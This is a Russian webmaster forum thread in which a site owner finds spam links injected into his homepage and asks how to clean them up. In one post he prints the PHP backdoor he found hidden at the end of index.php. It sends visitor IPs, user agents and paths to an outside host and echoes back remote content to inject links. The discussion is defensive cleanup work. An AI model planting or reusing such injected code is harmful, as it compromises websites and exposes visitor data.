X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали сайт и повесили чужую ссылку, как решить проблему?
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:03; Ответить: Gek
Сообщение #1


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Ситуация такая, сегодня обнаружил внизу главной страницы сайта чужую ссылку. Вот код:

    </td>
   </tr>
  </table>
</center>
</body>
</html>

<a href="http://чужой_сайт.ком">название сайта с виагрой</a>


Сам файл низа - чистый, страничка можно сказать статическая, это не CSM, главная страничка собирается из:

верх.html
индекс.php
низ.html

Так вот, хостер разводит руками, мол ищи проблему сам, это у тебя где-то чего-то там. Сам я мало в этом чего понимаю, подскажите как можно решить проблему?

Пароль ФТП и cPanel поменял.


Поблагодарили: (1)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rokot
rokot
сообщение 3.9.2012, 22:12; Ответить: rokot
Сообщение #2


Loading...
******

Группа: Super Moderator
Сообщений: 1619
Регистрация: 6.7.2012
Поблагодарили: 899 раз
Репутация:   133  


ищите в .htaccess и index.php


--------------------
Дешевый и быстрый хостинг (US,RU сервера) | ПРОМОКОД на 10% - OFF10
Сайты на WordPress от 1500 рублей!


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:15; Ответить: Gek
Сообщение #3


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Скажие, что искать - название чужого сайта?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LoraDi
LoraDi
сообщение 3.9.2012, 22:18; Ответить: LoraDi
Сообщение #4


С Joomla на ты...
*****

Группа: Active User
Сообщений: 836
Регистрация: 11.12.2010
Из: Молдовы
Поблагодарили: 295 раз
Репутация:   73  


Смотрите может есть где такая надпись "base64" ссылка может быть закодирована...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 3.9.2012, 22:27; Ответить: Gek
Сообщение #5


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Сейчас посмотрел, все чисто и в .htaccess и index.php

Да, и еще. Чужих ссылок несколько (и они разные):

На мой_сайт.ком одна, а на мой_сайт.ком/индекс.php ссылка совсем другая. Сдается мне, что они могут и по целому сайту расползтись.

Сообщение отредактировал Gek - 3.9.2012, 22:29
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
loginmain
loginmain
сообщение 3.9.2012, 23:32; Ответить: loginmain
Сообщение #6


Оптимизатор
*******

Группа: Super Moderator
Сообщений: 4327
Регистрация: 5.10.2008
Из: UA
Поблагодарили: 1946 раз
Репутация:   196  


МОжет кто-то сапу поставил вам?? Внимательно проверяйте на лишний код все.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 4.9.2012, 7:13; Ответить: Gek
Сообщение #7


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Кстати этот сайт участвует в Сапе. Когда убирал мой код Сапы, то чужая ссылка оставалась. Буду думать и по этому поводу.

Нашел проблему, чужой код был действительно в файле индекс.php. Но его вписали в самый низ и далеко так вбок, поэтому в редакторе не смог его сразу найти (проглядел). Не знаю можно ли тут выложить этот код, но выложу, может кому будет интересно.

Вопрос остается, как он туда попал? Может надо хостера поменять? Или пароли мои были слабые и их просто подобрали (не менял давно).

Чужой код, был в самом конце индекс.php (выводились ссылки на сайт с виагрой).

         <?php
    /*This code use for global bot statistic*/     $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); /*Looks for google search bot*/     $sReferer = '';     if(isset($_SERVER['HTTP_REFERER']) === true)     {         $sReferer = strtolower($_SERVER['HTTP_REFERER']);     }     if(!(strpos($sUserAgent, 'google') === false)) /*Bot comes*/     {         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) /*Create bot analitics*/                     echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer) );     } else     {         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) /*Create bot analitics*/                     echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));     } /*Statistic code end*/
?>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
loginmain
loginmain
сообщение 4.9.2012, 8:55; Ответить: loginmain
Сообщение #8


Оптимизатор
*******

Группа: Super Moderator
Сообщений: 4327
Регистрация: 5.10.2008
Из: UA
Поблагодарили: 1946 раз
Репутация:   196  


(Gek @ 4.9.2012, 6:13) *
Вопрос остается, как он туда попал? Может надо хостера поменять? Или пароли мои были слабые и их просто подобрали (не менял давно).

Сохраняли пароль на компе в фтп-менеджерах? Если да, то однозначно через комп. Никогда не сохраняйте пароли, всегда набирайте. Хостер в последнюю очередь виноват, вначале ищем проблемы у себя.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
djalin
djalin
сообщение 4.9.2012, 11:57; Ответить: djalin
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 414
Регистрация: 8.5.2011
Поблагодарили: 87 раз
Репутация:   9  


Поищите так же в других папках - лутше проверить весь сайт


--------------------
Услуги: установка WP + плагины. Установка SAPE: wordpress/phpbb/Quick.Cms/некоторые самописы (php)
Хостинг - The HostVille
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gek
Gek
Topic Starter сообщение 4.9.2012, 14:38; Ответить: Gek
Сообщение #10


Участник
***

Группа: User
Сообщений: 200
Регистрация: 1.12.2010
Поблагодарили: 26 раз
Репутация:   5  


Сохраняли пароль на компе в фтп-менеджерах?

Сохранял. smile.gif

У меня Касперский, вроде как доверяю ему - вирусов быть не должно.

djalin, плохо то, что у меня там не один сайт. Этот сайт главный, но там есть еще несколько сайтов на дополнительных доменах, сейчас сижу проверяю их, по мере возможности. Вроде пока ничего не нашел)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Попинайте сайт
0 yanat 338 Вчера, 23:06
автор: yanat
Открытая тема (нет новых ответов) Взломали аккаунт Алиекспресс
Внимание мошенники
9 Intersect 389 Вчера, 22:44
автор: Emtec
Открытая тема (нет новых ответов) Как мошенники зарабатывают на прямых трансляциях в Instagram
Не ждите порно в инстаграм, его нет
10 PostBrigada 1125 Вчера, 22:40
автор: JOHNY
Открытая тема (нет новых ответов) Маленький кейс как сделать много почтовых ящиков в Gmail
Один аккаунт = много ящиков
1 PostBrigada 509 Вчера, 21:34
автор: Pingunio
Горячая тема (нет новых ответов) [Услуги] Баннер/Графика/Сайт
56 FillPlay 5238 Вчера, 18:16
автор: FillPlay


 



RSS Текстовая версия Сейчас: 16.12.2017, 9:28
Дизайн